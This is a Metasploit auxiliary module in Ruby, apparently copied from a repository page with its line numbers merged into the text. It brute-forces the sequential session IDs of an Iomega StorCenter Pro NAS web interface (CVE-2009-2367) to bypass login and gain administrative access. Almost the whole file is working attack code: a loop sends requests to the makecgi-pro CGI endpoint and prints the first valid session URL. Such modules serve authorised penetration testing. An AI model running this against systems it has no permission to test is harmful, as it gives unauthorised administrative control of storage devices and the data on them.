Path: blob/master/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
19535 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize9super(10'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',11'Description' => %q{12The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,13allowing for simple brute force attacks to bypass authentication and gain administrative14access.15},16'References' => [17[ 'OSVDB', '55586' ],18[ 'CVE', '2009-2367' ],19],20'Author' => [ 'aushack' ],21'License' => MSF_LICENSE,22'Notes' => {23'Stability' => [CRASH_SAFE],24'SideEffects' => [IOC_IN_LOGS],25'Reliability' => []26}27)2829register_options(30[31OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])32]33)34end3536def run37datastore['SID_MAX'].times do |x|38print_status("Trying session ID #{x}")3940res = send_request_raw({41'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",42'method' => 'GET'43}, 25)4445if res && res.to_s =~ /Log out/46print_status("Found valid session ID number #{x}!")47print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")48break49end50rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout51print_error("Unable to connect to #{rhost}:#{rport}")52break53rescue ::Timeout::Error, ::Errno::EPIPE => e54vprint_error(e.message)55end56end57end585960